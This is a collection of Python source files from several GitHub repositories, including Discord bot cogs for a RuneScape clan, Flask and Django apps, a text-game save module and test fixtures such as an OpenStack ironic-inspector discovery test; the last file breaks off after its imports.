metadata (dict) | text (string, lengths 60 to 3.49M)
{
"source": "JohnVictor2017/StartTm",
"score": 2
}
#### File: StartTm/perfis/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from perfis.models import Perfil
from django.shortcuts import redirect
def index(request):
return render(request, 'index.html', { 'perfis' : Perfil.objects.all()})
#def exibir(request, perfil_id):
#
# perfil = Perfil.objects.get(id=perfil_id)
# return render(request, 'perfil.html', { "perfil" : perfil })
#def convidar(request, perfil_id):
#
# perfil_a_convidar = Perfil.objects.get(id=perfil_id)
# perfil_logado = get_perfil_logado(request)
# perfil_logado.convidar(perfil_a_convidar)
# return redirect('index');
def get_perfil_logado(request):
return Perfil.objects.get(id=1)
```
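A possible way to wire the `index` view above into Django's URL dispatcher; this is a hedged sketch, not code from the repository, and it assumes Django 2.0+ (`django.urls.path`) and a project-level `urls.py`:

```python
# Hypothetical project urls.py -- the route names and layout are assumptions.
from django.contrib import admin
from django.urls import path

from perfis import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.index, name='index'),
]
```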
{
"source": "johnvictorfs/atlantisbot-rewrite",
"score": 2
}
#### File: bot/cogs/clan.py
```python
import rs3clans
import discord
from discord.ext import commands
from bot.bot_client import Bot
from bot.utils.tools import separator
from bot.utils.context import Context
class Clan(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
@commands.cooldown(1, 5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=['clan'])
async def clan_detail_info(self, ctx: Context, *, clan_name: str):
try:
clan = rs3clans.Clan(name=clan_name, set_exp=True)
except ConnectionError:
return await ctx.send(f"Houve um erro ao tentar conectar a API da Jagex. Tente novamente mais tarde.")
except rs3clans.ClanNotFoundError:
return await ctx.send(f"O clã '{clan_name}' não existe.")
clan_leader = None
for member in clan:
if member.rank == 'Owner':
clan_leader = member.name
clan_url = clan.name.replace(' ', '%20')
clan_embed = discord.Embed(
title=clan.name,
color=discord.Color.green(),
url=f'http://services.runescape.com/m=clan-home/clan/{clan_url}'
)
clan_embed.set_author(name='RuneClan', url=f'https://runeclan.com/clan/{clan_url}')
clan_embed.set_thumbnail(url=f'http://services.runescape.com/m=avatar-rs/{clan_url}/clanmotif.png')
clan_embed.add_field(name="Exp Total", value=f'{clan.exp:,}')
clan_embed.add_field(name="Membros", value=str(clan.count))
clan_embed.add_field(name="Líder", value=clan_leader)
clan_embed.add_field(name="Exp Média por Membro", value=f'{clan.avg_exp:,.0f}')
return await ctx.send(embed=clan_embed)
@commands.cooldown(1, 5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=['claninfo', 'clanexp', 'claexp', 'clainfo', 'clãexp', 'clãinfo'])
async def clan_user_info(self, ctx: Context, *, username: str):
try:
player = rs3clans.Player(name=username, runemetrics=True)
except ConnectionError:
return await ctx.send(f"Houve um erro ao tentar conectar a API da Jagex. Tente novamente mais tarde.")
if not player.exists:
return await ctx.send(f"Jogador '{player.name}' não existe.")
if not player.clan:
return await ctx.send(f"Jogador '{player.name}' não está em um clã.")
user_clan = rs3clans.Clan(name=player.clan)
member = user_clan.get_member(username)
user_clan_exp = member.exp
user_rank = member.rank
display_username = player.name
if self.bot.setting.show_titles:
if player.suffix:
display_username = f"{player.name} {player.title}"
else:
display_username = f"{player.title} {player.name}"
user_url_name = player.name.replace(" ", "%20")
user_url_clan = player.clan.replace(" ", "%20")
icon_url = f"https://secure.runescape.com/m=avatar-rs/{user_url_name}/chat.png"
runeclan_url = f"https://runeclan.com/user/{user_url_name}"
clan_banner_url = f"http://services.runescape.com/m=avatar-rs/l=3/a=869/{user_url_clan}/clanmotif.png"
embed_title = "RuneClan"
rank_header = "__Rank__"
clan_header = "__Clã__"
exp_header = "__Exp no Clã__"
total_exp_header = "__Exp Total__"
private_profile_header = "Indisponível - Perfil Privado"
rank_emoji = self.bot.setting.clan_settings[user_rank]['Emoji']
user_rank = self.bot.setting.clan_settings[user_rank]['Translation']
clan_info_embed = discord.Embed(
title=embed_title,
description="",
color=discord.Colour.dark_blue(),
url=runeclan_url,
)
clan_info_embed.set_author(
icon_url=icon_url, name=display_username
)
clan_info_embed.set_thumbnail(
url=clan_banner_url
)
clan_info_embed.add_field(
name=clan_header,
value=player.clan
)
clan_info_embed.add_field(
name=rank_header,
value=f"{user_rank} {rank_emoji}"
)
clan_info_embed.add_field(
name=exp_header,
value=f"{user_clan_exp:,}"
)
if player.private_profile:
clan_info_embed.add_field(
name=total_exp_header,
value=private_profile_header,
inline=False
)
else:
clan_info_embed.add_field(
name=total_exp_header,
value=f"{player.exp:,}"
)
return await ctx.send(content=None, embed=clan_info_embed)
@commands.cooldown(1, 5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=['ranksupdate', 'upranks', 'rank'])
async def ranks(self, ctx: Context, *, clan: str = 'Atlantis'):
if clan.lower() == 'atlantis argus':
return await ctx.send('`!rank argus` irmão')
elif clan.lower() == 'atlantis':
exp_general = 2_000_000_000
exp_captain = 1_000_000_000
exp_lieutenant = 500_000_000
exp_seargent = 250_000_000
exp_corporal = 125_000_000
elif clan.lower() == 'argus':
exp_general = 500_000_000
exp_captain = 250_000_000
exp_lieutenant = 125_000_000
exp_seargent = 60_000_000
exp_corporal = 30_000_000
clan = 'Atlantis Argus'
else:
return await ctx.send('Clã não reconhecido.')
rank_emoji = {
'Recruit': self.bot.setting.clan_settings['Recruit']['Emoji'],
'Corporal': self.bot.setting.clan_settings['Corporal']['Emoji'],
'Sergeant': self.bot.setting.clan_settings['Sergeant']['Emoji'],
'Lieutenant': self.bot.setting.clan_settings['Lieutenant']['Emoji'],
'Captain': self.bot.setting.clan_settings['Captain']['Emoji'],
'General': self.bot.setting.clan_settings['General']['Emoji'],
}
ranks_embed = discord.Embed(
title="__Ranks a Atualizar__",
description=" ",
)
found = False
clan = rs3clans.Clan(clan, set_exp=False)
clan_members = reversed([member for member in clan])
member: rs3clans.ClanMember
for member in clan_members:
if len(ranks_embed.fields) >= 20:
await ctx.send('Muitos ranks a serem atualizados, enviando apenas os 20 primeiros.')
break
if member.exp >= exp_corporal and member.rank == 'Recruit':
ranks_embed.add_field(
name=member.name,
value=f"Recruta {rank_emoji['Recruit']} ❯ Cabo {rank_emoji['Corporal']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_general and member.rank == 'Captain':
ranks_embed.add_field(
name=member.name,
value=f"Capitão {rank_emoji['Captain']} ❯ General {rank_emoji['General']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_captain and member.rank == 'Lieutenant':
ranks_embed.add_field(
name=member.name,
value=f"Tenente {rank_emoji['Lieutenant']} ❯ Capitão {rank_emoji['Captain']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_lieutenant and member.rank == 'Sergeant':
ranks_embed.add_field(
name=member.name,
value=f"Sargento {rank_emoji['Sergeant']} ❯ Tenente {rank_emoji['Lieutenant']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_seargent and member.rank == 'Corporal':
ranks_embed.add_field(
name=member.name,
value=f"Cabo {rank_emoji['Corporal']} ❯ Sargento {rank_emoji['Sergeant']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
if not found:
ranks_embed.add_field(
name="Nenhum Rank a ser atualizado no momento :)",
value=separator,
inline=False
)
return await ctx.send(embed=ranks_embed)
def setup(bot):
bot.add_cog(Clan(bot))
```
#### File: bot/cogs/error_handler.py
```python
import datetime
import logging
from concurrent.futures._base import TimeoutError
import sentry_sdk
import discord
from discord.ext import commands
from bot.bot_client import Bot
from bot.utils.context import Context
class CommandErrorHandler(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
self.logger = logging.getLogger('commands')
self.logger.setLevel(logging.INFO)
handler = logging.FileHandler(filename='commands.log', encoding='utf-8')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
if not self.logger.handlers:
# Prevent multiple handlers sending duplicate messages
self.logger.addHandler(handler)
async def bot_check(self, ctx: Context):
"""This runs at the start of every command"""
await ctx.trigger_typing()
time = datetime.datetime.utcnow().strftime('%d/%m/%y - %H:%M')
msg = f"'{ctx.command}' ran by '{ctx.author}' as '{ctx.invoked_with}' at {time}. with '{ctx.message.content}'"
self.logger.info(msg)
return True
@commands.Cog.listener()
async def on_command_error(self, ctx: Context, error: commands.CommandError):
if hasattr(ctx.command, 'on_error'):
# Don't try to handle the error if the command has a local handler
return
arguments_error = [
commands.MissingRequiredArgument,
commands.BadArgument,
commands.TooManyArguments,
]
if any([isinstance(error, arg_error) for arg_error in arguments_error]):
embed = discord.Embed(
title=f"Argumentos do comando '{ctx.command}':",
description="",
color=discord.Colour.red()
)
for param, param_type in ctx.command.clean_params.items():
try:
default_name = param_type.default.__name__
except AttributeError:
default_name = param_type.default
default = f"(Opcional, Padrão: {default_name})" if default_name != '_empty' else '(Obrigatório)'
p_type = param_type.annotation.__name__
if p_type == 'str':
p_type = 'Texto'
elif p_type == 'bool':
p_type = '[True, False]'
elif p_type == 'Member':
p_type = 'Membro'
elif p_type == 'int':
p_type = 'Número'
embed.add_field(name=param, value=f"**Tipo:** *{p_type}*\n*{default}*", inline=False)
try:
await ctx.send(embed=embed)
except discord.errors.Forbidden:
await ctx.send("Erro. Permissões insuficientes para enviar um Embed.")
elif isinstance(error, commands.CommandNotFound):
pass
elif isinstance(error, commands.DisabledCommand):
pass
# await ctx.send("Esse comando está desabilitado.")
elif isinstance(error, commands.NoPrivateMessage):
await ctx.send("Esse comando não pode ser usado em mensagens privadas.")
elif isinstance(error, commands.PrivateMessageOnly):
await ctx.send(
f"Esse comando só pode ser usado em Mensagens Privadas.\n"
f"Fale comigo aqui: {self.bot.user.mention}"
)
elif isinstance(error, commands.NotOwner):
await ctx.send("Você não pode usar isso.")
elif isinstance(error, commands.MissingPermissions):
permissions = [f"***{perm.title().replace('_', ' ')}***" for perm in error.missing_perms]
await ctx.send(f"Você precisa das seguintes permissões para fazer isso: {', '.join(permissions)}")
elif isinstance(error, commands.CommandOnCooldown):
await ctx.send(
f"Ei! Você já usou este comando recentemente. "
f"Espere mais {error.retry_after:.1f}s para usar novamente"
)
elif isinstance(error, commands.BotMissingPermissions):
permissions = [f"***{perm.title().replace('_', ' ')}***" for perm in error.missing_perms]
await ctx.send(f"Eu preciso das seguintes permissões para fazer isso: {', '.join(permissions)}")
elif isinstance(error, commands.errors.CheckFailure):
pass
elif isinstance(error, commands.errors.CommandInvokeError) and isinstance(error.original, TimeoutError):
await ctx.send('Ação cancelada. Tempo esgotado.')
else:
await ctx.send("Erro inesperado. Os logs desse erro foram enviados para um Dev e em breve será arrumado.")
sentry_sdk.set_user({
'id': ctx.author and ctx.author.id,
'username': str(ctx.author) if ctx.author else None,
})
sentry_sdk.set_context('discord', {
'guild': ctx.guild,
'channel': ctx.channel and (hasattr(ctx.channel, 'name') or None) and ctx.channel,
'message': ctx.message and ctx.message.content,
'message_id': ctx.message and ctx.message.id,
'cog': ctx.cog and ctx.cog.qualified_name,
'command': ctx.command and ctx.command.name
})
sentry_sdk.capture_exception(error)
def setup(bot):
bot.add_cog(CommandErrorHandler(bot))
```
#### File: bot/utils/teams.py
```python
from typing import Union, Tuple
import traceback
from django.db.models import Q
from atlantisbot_api.models import DiscordUser, Team, Player, BotMessage
import discord
from bot.utils.tools import has_any_role, separator
class TeamNotFoundError(Exception):
pass
class WrongChannelError(Exception):
pass
def secondary_full(team: Team) -> Tuple[int, bool]:
"""Checks if a team has hit its limit for number of players that only have its secondary role requirement"""
secondary_count = team.players.filter(secondary=True).count()
if not team.secondary_limit:
# If the team does not have a secondary role limit, then it can't ever reach that
return 0, False
return secondary_count, (secondary_count >= team.secondary_limit)
def add_to_team(author: discord.Member, team: Team, substitute: bool, secondary: bool) -> None:
"""Adds a Player to a Team"""
added_player = Player(player_id=str(author.id), team=team, substitute=substitute, secondary=secondary)
added_player.save()
def first_substitute(team: Team, exclude: int) -> Union[Player, None]:
return team.players.filter(~Q(player_id=str(exclude)), substitute=True).first()
def remove_from_team(player_id: int, team: Team) -> None:
team.players.filter(player_id=str(player_id)).delete()
def team_count(team: Team) -> int:
return team.players.count()
async def update_team_message(message: discord.Message, team: Team, prefix: str) -> None:
embed_description = f"Marque presença no <#{team.invite_channel_id}>\n Criador: <@{team.author_id}>"
requisito = ""
requisito2 = ""
if team.role:
requisito = f"Requisito: <@&{team.role}>\n"
if team.role_secondary:
count = team.players.filter(secondary=True).count()
limit = "" if not team.secondary_limit else f"({count}/{team.secondary_limit})"
requisito2 = f"Requisito Secundário: <@&{team.role_secondary}> {limit}\n\n"
embed_description = f"{requisito}{requisito2}{embed_description}"
team_embed = discord.Embed(
title=f"__{team.title}__ - {team_count(team)}/{team.size}",
description=embed_description,
color=discord.Color.purple()
)
footer = f"Digite '{prefix}del {team.team_id}' para excluir o time. (Criador do time ou Admin e acima)"
team_embed.set_footer(text=footer)
index = 0
for player in team.players.all():
if not player.substitute:
user = DiscordUser.objects.filter(discord_id=player.player_id).first()
player_role = f"({player.role})" if player.role else ""
if user:
player_ingame = f"({user.ingame_name})"
else:
player_ingame = ""
player_value = (
f"{index + 1}- <@{player.player_id}> {player_role} {player_ingame}"
f"{'***(Secundário)***' if player.secondary else ''}"
)
team_embed.add_field(name=separator, value=player_value, inline=False)
index += 1
for player in team.players.all():
if player.substitute:
user_ = DiscordUser.objects.filter(discord_id=player.player_id).first()
if user_:
player_ingame = f"({user_.ingame_name})"
else:
player_ingame = ""
player_role = f"({player.role})" if player.role else ""
player_value = (f"- <@{player.player_id}> {player_role} {player_ingame} ***(Substituto)*** "
f"{'***(Secundário)***' if player.secondary else ''}")
team_embed.add_field(name=separator, value=player_value, inline=False)
await message.edit(embed=team_embed)
async def manage_team(team_id: str, client, message: discord.Message, mode: str) -> None:
"""
Manages a join or leave for a Team
mode: can be 'join' or 'leave'
"""
try:
team = Team.objects.filter(team_id=team_id).first()
if not team:
raise TeamNotFoundError
if int(team.invite_channel_id or 0) != message.channel.id:
raise WrongChannelError
await message.delete()
current_players = team.players
substitutes = team.players.filter(substitute=True)
invite_channel: discord.TextChannel = client.get_channel(int(team.invite_channel_id or 0))
team_channel: discord.TextChannel = client.get_channel(int(team.team_channel_id or 0))
if not invite_channel or not team_channel:
return await delete_team(team, client)
try:
team_message = await team_channel.fetch_message(int(team.team_message_id or 0))
except discord.errors.NotFound:
return await delete_team(team, client)
text = ''
no_perm_embed = None
if mode == 'join':
team_role = None if not team.role else int(team.role)
secondary_team_role = None if not team.role_secondary else int(team.role_secondary)
has_main = has_any_role(message.author, team_role) # Has main role requirement
has_secondary = has_any_role(message.author, secondary_team_role) # Has secondary role requirement
has_any = has_any_role(message.author, team_role, secondary_team_role) # Has either or both
# Has only secondary requirement
is_secondary = True if (has_secondary and not has_main) else False
if is_secondary:
_, is_team_full = secondary_full(team)
else:
is_team_full = is_full(team)
if in_team(message.author.id, team):
text = 'já está no time'
elif has_any or not team_role:
add_to_team(message.author, team, substitute=is_team_full, secondary=is_secondary)
text = 'entrou ***como substituto*** no time' if is_team_full else 'entrou no time'
else:
description = f"{message.author.mention}, você precisa ter o cargo <@&{team.role}>"
if team.role_secondary:
description = f"{description} ou o cargo <@&{team.role_secondary}>"
description = (f"{description} para entrar no Time '{team.title}' "
f"({current_players.count() - substitutes.count()}/{team.size})\n"
f"(*`{message.content}`*)")
no_perm_embed = discord.Embed(
title=f"__Permissões insuficientes__",
description=description,
color=discord.Color.dark_red()
)
elif mode == 'leave':
if in_team(message.author.id, team):
text = 'saiu do time'
substitute: Player = first_substitute(team, message.author.id)
is_substitute = team.players.filter(player_id=str(message.author.id)).first().substitute
# If the person leaving is not a substitute and there is one available, then
# make that substitute not be a substitute anymore
if substitute and not is_substitute:
if substitute.secondary and secondary_full(team)[1]:
pass
else:
substitute.substitute = False
substitute.save()
_text = (f"<@{substitute.player_id}> não é mais um substituto do time "
f"**[{team.title}]({team_message.jump_url})** "
f"({current_players.count() - substitutes.count() - 1}/{team.size})")
embed = discord.Embed(title='', description=_text, color=discord.Color.green())
msg = await invite_channel.send(content=f"<@{substitute.player_id}>", embed=embed)
bot_message = BotMessage(message_id=msg.id, team=team)
bot_message.save()
remove_from_team(message.author.id, team)
else:
text = 'já não estava no time'
if no_perm_embed:
sent_message = await invite_channel.send(embed=no_perm_embed)
else:
_text = (f"{message.author.mention} {text} **[{team.title}]({team_message.jump_url})** "
f"({current_players.count() - substitutes.count()}/{team.size})\n\n *`{message.content}`*")
if mode == 'leave':
embed_color = discord.Color.red()
else:
embed_color = discord.Color.green()
embed = discord.Embed(title='', description=_text, color=embed_color)
embed.set_author(name=message.author.display_name, icon_url=message.author.avatar_url)
sent_message = await invite_channel.send(embed=embed)
bot_message = BotMessage(message_id=sent_message.id, team=team)
bot_message.save()
try:
await update_team_message(team_message, team, client.setting.prefix)
except discord.errors.NotFound:
team.delete()
except TeamNotFoundError:
raise TeamNotFoundError
except WrongChannelError:
raise WrongChannelError
except Exception as e:
await client.send_logs(e, traceback.format_exc())
def is_full(team: Team) -> bool:
"""Verifies if a team is full or not"""
count = team.players.filter(substitute=False).count()
return count >= team.size
def in_team(author_id: int, team: Team) -> bool:
"""Checks if a player is in a team"""
return author_id in [int(player.player_id) for player in team.players.all()]
async def delete_team(team: Team, client) -> None:
try:
team_channel = client.get_channel(int(team.team_channel_id or 0))
invite_channel = client.get_channel(int(team.invite_channel_id or 0))
except Exception:
team.delete()
return
try:
team_message = await team_channel.fetch_message(int(team.team_message_id or 0))
await team_message.delete()
except Exception:
pass
try:
invite_message = await invite_channel.fetch_message(int(team.invite_message_id or 0))
await invite_message.delete()
except Exception:
pass
try:
messages_to_delete = []
for message in BotMessage.objects.filter(team=team):
to_delete = await invite_channel.fetch_message(message.message_id)
messages_to_delete.append(to_delete)
await invite_channel.delete_messages(messages_to_delete)
except Exception:
pass
team.delete()
```
{
"source": "johnvictorfs/cytheron",
"score": 3
}
#### File: cytheron/cytheron/logger.py
```python
from colorama import Fore
import logging
class CustomFormatter(logging.Formatter):
"""
https://stackoverflow.com/a/56944256/10416161
    Logging formatter that adds colors to log records based on their level
"""
log_format = "%(levelname)s - %(message)s (%(filename)s:%(lineno)d)"
FORMATS = {
logging.DEBUG: Fore.LIGHTWHITE_EX + log_format + Fore.RESET,
logging.INFO: Fore.LIGHTWHITE_EX + log_format + Fore.RESET,
logging.WARNING: Fore.YELLOW + log_format + Fore.RESET,
logging.ERROR: Fore.RED + log_format + Fore.RESET,
logging.CRITICAL: Fore.RED + log_format + Fore.RESET
}
def format(self, record: logging.LogRecord):
log_fmt = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_fmt)
return formatter.format(record)
```
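A minimal usage sketch for the formatter above, assuming it is attached to a console handler; the import path, logger name, and messages are assumptions, not code from the repository:

```python
# Hedged sketch: attach CustomFormatter to a StreamHandler so records are
# colorized according to the FORMATS mapping above.
import logging

from cytheron.logger import CustomFormatter  # assumed import path

handler = logging.StreamHandler()
handler.setFormatter(CustomFormatter())

logger = logging.getLogger("cytheron")
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)

logger.warning("low disk space")        # rendered in yellow
logger.error("something went wrong")    # rendered in red
```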
{
"source": "johnvictorfs/discord_bot_template",
"score": 2
}
#### File: discord_bot_template/tests/conftest.py
```python
import glob
import os
import discord.ext.test as dpytest
import pytest
from rich import print
from bot.bot_client import Bot
from bot.settings import Settings
@pytest.fixture
def bot(request, event_loop):
"""
https://dpytest.readthedocs.io/en/latest/tutorials/using_pytest.html#starting-with-pytest
"""
settings: Settings = {'token': 'abc', 'prefix': '!'}
bot = Bot(settings=settings, loop=event_loop)
print()
for extension in bot.get_cogs():
try:
bot.load_extension(f'bot.cogs.{extension}')
bot.print_success(f'Loaded extension [cyan]{extension}[/cyan]')
except Exception as e:
error = f'{extension}:\n {type(e).__name__} : {e}'
bot.print_error(f'Failed to load extension [cyan]{extension}[/cyan].\n[red]{error}[/red]')
print('[green bold]Finished loading all extensions.[/green bold]')
dpytest.configure(bot)
return bot
def pytest_sessionfinish():
# Clean up attachment files
files = glob.glob('./dpytest_*.dat')
for path in files:
try:
os.remove(path)
except Exception as e:
print(f'Error while deleting file {path}: {e}')
@pytest.fixture(autouse=True)
async def cleanup():
yield
await dpytest.empty_queue()
```
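A sketch of a test that could consume the `bot` fixture above, following the dpytest quickstart pattern; the `ping` command and its `Pong!` reply are assumptions rather than commands shipped with this template, and the verify API may differ between dpytest versions:

```python
# Hypothetical test: send a command through dpytest and check the bot's reply.
import discord.ext.test as dpytest
import pytest


@pytest.mark.asyncio
async def test_ping(bot):
    await dpytest.message("!ping")
    assert dpytest.verify().message().content("Pong!")
```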
{
"source": "johnvictorfs/pypip-info",
"score": 2
}
#### File: johnvictorfs/pypip-info/main.py
```python
from flask import Flask, jsonify, render_template, send_from_directory
from flaskwebgui import FlaskUI
from flask_cors import CORS
from pip_gui.pypi import search_pypi, get_package
DEBUG = False
app = Flask(__name__, static_url_path='/static')
app.config.from_object(__name__)
CORS(app, resources={r"/api/*": {"origins": "*"}})
ui = FlaskUI(app)
# Serve static files
@app.route('/js/<path:path>')
def send_js(path):
return send_from_directory('templates/js', path)
@app.route('/css/<path:path>')
def send_css(path):
return send_from_directory('templates/css', path)
@app.route("/api/search/<string:query>")
def index(query):
"""
Search PyPi API
"""
return jsonify(search_pypi(query))
@app.route("/api/package/<string:package_name>")
def package(package_name):
return jsonify(get_package(package_name))
@app.route("/")
def homepage():
return render_template("index.html")
if __name__ == '__main__':
ui.run()
```
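A hedged client-side sketch of calling the JSON endpoints above once the app is running; the host and port assume Flask's defaults, and `flaskwebgui` may serve on a different port in practice:

```python
# Illustrative only: query the search and package endpoints defined above.
import requests

base = "http://127.0.0.1:5000"
search_results = requests.get(f"{base}/api/search/flask").json()
package_info = requests.get(f"{base}/api/package/requests").json()
print(search_results, package_info)
```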
{
"source": "johnvictorfs/sacred-river-2",
"score": 3
}
#### File: sacred-river-2/sacred-river/usersave.py
```python
from player import Player
import configparser
import inventory
from prompt import prompt
STATUS_FILE = 'user_stats.ini'
INVENTORY_FILE = 'inventory.ini'
def settings_exist(file=STATUS_FILE):
"""
    Verifies whether the given save file exists.
:return: bool
"""
try:
with open(file, 'r'):
return True
except FileNotFoundError:
return False
def read_save_status(file=STATUS_FILE):
status_file = configparser.ConfigParser()
status_file.read(file)
user_name = status_file['USER_STATS']['name']
user_attack = status_file['USER_STATS']['attack']
user_defence = status_file['USER_STATS']['defence']
user_health = status_file['USER_STATS']['health']
user_gold = status_file['USER_STATS']['gold']
user_luck = status_file['USER_STATS']['luck']
player_save = Player(user_name, user_attack, user_defence, user_health, user_gold, user_luck)
return player_save
def read_inventory_status(file=INVENTORY_FILE):
inventory_file = configparser.ConfigParser()
inventory_file.read(file)
try:
for key in inventory_file['USER_INVENTORY']:
for item in inventory.item_list:
if str(key) == str(item.id):
for quantity in range(int(inventory_file['USER_INVENTORY'][key])):
inventory.inv.add_item(item, message=False)
for key in inventory_file['USER_EQUIPMENT']:
for item in inventory.item_list:
if str(key) == str(item.id):
inventory.inv.add_item(item, message=False)
inventory.inv.equip_item(item, message=False)
except KeyError:
return
def create_save(name):
config = configparser.ConfigParser()
config['USER_STATS'] = {
'name': name,
'attack': 10,
'defence': 0,
'health': 50,
'gold': 20,
'luck': 1
}
if settings_exist(file=STATUS_FILE):
player_save = read_save_status()
return player_save
else:
with open(STATUS_FILE, 'w') as config_file:
config.write(config_file)
return
def create_user_data():
if settings_exist():
user = read_save_status(file=STATUS_FILE)
read_inventory_status()
if user.health <= 0:
create_save(user.name)
user = read_save_status(file=STATUS_FILE)
return user
return user
else:
user_name = prompt("\n< How are you called? >\n\n>> ")
create_save(user_name)
user = read_save_status(file=STATUS_FILE)
return user
def save_stats():
config = configparser.ConfigParser()
config['USER_STATS'] = {
'name': player.name,
'attack': player.attack,
'defence': player.defence,
'health': player.health,
'gold': player.gold,
'luck': player.luck
}
with open(STATUS_FILE, 'w') as config_file:
config.write(config_file)
def save_inventory():
config = configparser.ConfigParser()
config['USER_INVENTORY'] = {}
config['USER_EQUIPMENT'] = {}
for item in inventory.inv.items.values():
config['USER_INVENTORY'][str(item.id)] = str(item.quantity)
for item in inventory.inv.equipment.values():
config['USER_EQUIPMENT'][str(item.id)] = str(item.item_type)
with open('inventory.ini', 'w') as config_file:
config.write(config_file)
def save_game():
print("[[[ Saving game... ]]]")
save_stats()
save_inventory()
print("[ Game Saved ]")
prompt()
player = create_user_data()
```
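For reference, a sketch of reading back the save file that `create_save` and `save_stats` above write; the stat values shown in the comment are just the defaults from `create_save`:

```python
# Illustrative only: user_stats.ini holds a single USER_STATS section with
# name/attack/defence/health/gold/luck keys, all stored as strings.
import configparser

config = configparser.ConfigParser()
config.read("user_stats.ini")
stats = dict(config["USER_STATS"])
print(stats)  # e.g. {'name': 'Hero', 'attack': '10', 'defence': '0', ...}
```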
{
"source": "JohnVillalovos/controller",
"score": 2
}
#### File: controller/tests/conftest.py
```python
import pytest
from starlette.testclient import TestClient
@pytest.fixture(scope="function")
def client():
from controller.main import app
client = TestClient(app)
return client
```
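A minimal sketch of a test built on the `client` fixture above; the `/` route and the expected 200 status are assumptions about `controller.main.app`, not taken from the repository:

```python
# Hypothetical test exercising the fixture above.
def test_root_returns_ok(client):
    response = client.get("/")
    assert response.status_code == 200
```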
{
"source": "JohnVillalovos/ironic-tempest-plugin-inspector",
"score": 2
}
#### File: ironic_tempest_plugin/tests/test_discovery.py
```python
import six
from ironic_tempest_plugin.tests.scenario import baremetal_manager
from tempest import config
from tempest.lib import decorators
from tempest import test # noqa
from ironic_inspector.test.inspector_tempest_plugin.tests import manager
CONF = config.CONF
ProvisionStates = baremetal_manager.BaremetalProvisionStates
class InspectorDiscoveryTest(manager.InspectorScenarioTest):
@classmethod
def skip_checks(cls):
super(InspectorDiscoveryTest, cls).skip_checks()
if not CONF.baremetal_introspection.auto_discovery_feature:
msg = ("Please, provide a value for node_not_found_hook in "
"processing section of inspector.conf for enable "
"auto-discovery feature.")
raise cls.skipException(msg)
def setUp(self):
super(InspectorDiscoveryTest, self).setUp()
discovered_node = self._get_discovery_node()
self.node_info = self._get_node_info(discovered_node)
rule = self._generate_discovery_rule(self.node_info)
self.rule_import_from_dict(rule)
self.addCleanup(self.rule_purge)
def _get_node_info(self, node_uuid):
node = self.node_show(node_uuid)
ports = self.node_port_list(node_uuid)
node['port_macs'] = [port['address'] for port in ports]
return node
def _get_discovery_node(self):
nodes = self.node_list()
discovered_node = None
for node in nodes:
if (node['provision_state'] == ProvisionStates.AVAILABLE or
node['provision_state'] == ProvisionStates.ENROLL or
node['provision_state'] is ProvisionStates.NOSTATE):
discovered_node = node['uuid']
break
self.assertIsNotNone(discovered_node)
return discovered_node
def _generate_discovery_rule(self, node):
rule = dict()
rule["description"] = "Node %s discovery rule" % node['name']
rule["actions"] = [
{"action": "set-attribute", "path": "/name",
"value": "%s" % node['name']},
{"action": "set-attribute", "path": "/driver",
"value": "%s" % node['driver']},
]
for key, value in node['driver_info'].items():
rule["actions"].append(
{"action": "set-attribute", "path": "/driver_info/%s" % key,
"value": "%s" % value})
rule["conditions"] = [
{"op": "eq", "field": "data://auto_discovered", "value": True}
]
return rule
def verify_node_introspection_data(self, node):
data = self.introspection_data(node['uuid'])
self.assertEqual(data['cpu_arch'],
self.flavor['properties']['cpu_arch'])
self.assertEqual(int(data['memory_mb']),
int(self.flavor['ram']))
self.assertEqual(int(data['cpus']), int(self.flavor['vcpus']))
def verify_node_flavor(self, node):
expected_cpus = self.flavor['vcpus']
expected_memory_mb = self.flavor['ram']
expected_cpu_arch = self.flavor['properties']['cpu_arch']
disk_size = self.flavor['disk']
ephemeral_size = self.flavor['OS-FLV-EXT-DATA:ephemeral']
expected_local_gb = disk_size + ephemeral_size
self.assertEqual(expected_cpus,
int(node['properties']['cpus']))
self.assertEqual(expected_memory_mb,
int(node['properties']['memory_mb']))
self.assertEqual(expected_local_gb,
int(node['properties']['local_gb']))
self.assertEqual(expected_cpu_arch,
node['properties']['cpu_arch'])
def verify_node_driver_info(self, node_info, inspected_node):
for key in node_info['driver_info']:
self.assertEqual(six.text_type(node_info['driver_info'][key]),
inspected_node['driver_info'].get(key))
@decorators.idempotent_id('dd3abe5e-0d23-488d-bb4e-344cdeff7dcb')
def test_bearmetal_auto_discovery(self):
"""This test case follows this set of operations:
* Choose appropriate node, based on provision state;
* Get node info;
* Generate discovery rule;
* Delete discovered node from ironic;
* Start baremetal vm via virsh;
        * Waiting for node introspection;
* Verify introspected node.
"""
        # NOTE(aarefiev): workaround for infra: the 'tempest' user doesn't
        # have virsh privileges, so let's power on the node via ironic
        # and then delete it. Because the node is blacklisted in inspector
        # we can't just power it on, therefore introspection is started
        # first to whitelist the discovered node.
self.baremetal_client.set_node_provision_state(
self.node_info['uuid'], 'manage')
self.introspection_start(self.node_info['uuid'])
self.wait_power_state(
self.node_info['uuid'],
baremetal_manager.BaremetalPowerStates.POWER_ON)
self.node_delete(self.node_info['uuid'])
self.wait_for_node(self.node_info['name'])
inspected_node = self.node_show(self.node_info['name'])
self.verify_node_flavor(inspected_node)
if CONF.service_available.swift:
self.verify_node_introspection_data(inspected_node)
self.verify_node_driver_info(self.node_info, inspected_node)
self.assertEqual(ProvisionStates.ENROLL,
inspected_node['provision_state'])
```
{
"source": "JohnVillalovos/subaligner",
"score": 3
}
#### File: subaligner/subaligner/utils.py
```python
import os
import subprocess
import pysubs2
import requests
import shutil
